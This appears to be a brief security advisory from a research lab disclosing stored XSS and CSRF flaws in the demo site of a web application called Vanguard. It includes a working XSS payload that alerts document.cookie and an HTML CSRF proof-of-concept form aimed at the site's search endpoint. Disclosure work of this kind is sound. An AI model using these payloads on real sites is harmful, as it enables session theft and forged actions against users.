Vanguard XSS/CSRF
ADLab of Venustech
Well, when I pentest the official demo site of Vanguard, I found some vulnerabilities here.
XSS:
There're some stored-xss in this system, for example:
http://vanguard-demo.esy.es/search
POST para:
POST parameter:
phps_query=123'"><svg/onload=alert(document.cookie)><'"&phps_search=
------WebKitFormBoundaryfu9qSQ2wg10j0QFz
CSRF:
Because of no protection here, we can use csrf attack to cheat the user to suffer from reflect-xss, or change something sensitive int the panel directly. By the way ,I just found no protection in the user panel here.
POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://vanguard-demo.esy.es/search" method="POST">
<input type="hidden" name="phps_query" value="123'"><svg/onload=alert(document.cookie)><'"" />
<input type="hidden" name="phps_search" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
